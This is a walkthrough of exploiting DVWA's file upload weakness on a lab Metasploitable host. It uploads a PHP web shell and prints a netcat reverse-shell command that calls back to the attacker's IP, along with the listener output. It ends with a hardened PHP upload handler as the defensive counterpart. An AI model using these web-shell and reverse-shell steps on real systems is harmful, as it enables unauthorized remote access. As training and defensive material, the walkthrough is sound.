Our goal is to exploit the weakness in the file upload checking and obtain a remote system shell on the host.
We start off with the security level set to low, so there is an unrestricted file upload vulnerability in play here.
As you can see, our file was uploaded successfully. Let's next move on to the medium security level and try to upload a remote shell to the host.
As you can see, we had to edit the filename in the POST request to the server so that the .php extension is the only extension in the filename.
We got a successful upload. Now let's visit the directory where the file resides and try to run some commands with it.
All that's left to do is get a connect-back shell from the remote host. We can set that up using a netcat listener.
/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088
sam@ubuntu:~$ nc -lvp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 54057 received!
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@metasploitable:/var/www/dvwa/hackable/uploads$ whoami
whoami
www-data
www-data
www-data@metasploitable:/var/www/dvwa/hackable/uploads$
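For comparison, here is what a server-side upload handler that closes the gap used above looks like. This is an added example, not DVWA's own code; it assumes a form field named uploaded and a storage directory /var/uploads_private that sits outside the web root, and it decides on the file's magic bytes rather than on the client-supplied Content-Type or filename.

```php
<?php
// Constructed example of hardened upload validation (not DVWA's code).
// Assumes a form field "uploaded" and a storage directory outside the web root.

const UPLOAD_DIR = '/var/uploads_private';   // assumed path, not served by the web server
const MAX_BYTES  = 2 * 1024 * 1024;
// Allowlist: permitted extension => MIME type the file's magic bytes must match.
const ALLOWED = ['jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png'];

function validate_upload(array $file): ?string {
    if (!isset($file['tmp_name'], $file['name'], $file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return null;
    }
    if ($file['size'] > MAX_BYTES || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Only the last extension counts, so "shell.php.jpg" is judged as "jpg" and
    // "shell.php" is rejected; the client's Content-Type header is never consulted.
    $ext = strtolower(pathinfo(basename($file['name']), PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED)) {
        return null;
    }
    // fileinfo reads the magic bytes from disk; the request cannot spoof this.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED[$ext]) {
        return null;
    }
    // Require a parseable image, which rejects a bare script with a faked extension.
    if (@getimagesize($file['tmp_name']) === false) {
        return null;
    }
    return $ext;
}

function store_upload(array $file): ?string {
    $ext = validate_upload($file);
    if ($ext === null) {
        return null;
    }
    // Server-chosen random name: the client-supplied filename never reaches the disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = UPLOAD_DIR . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0640);  // readable by the app, never executable
    return $name;
}

if (!empty($_FILES['uploaded'])) {
    $stored = store_upload($_FILES['uploaded']);
    echo $stored === null ? 'Upload rejected.' : 'Stored as ' . htmlspecialchars($stored);
}
```

Note that getimagesize accepts a valid image with script bytes appended after it, so the directory holding uploads must also never be mapped to the PHP handler; storing outside the web root and serving files through a read-only download script is what makes the extension check hold.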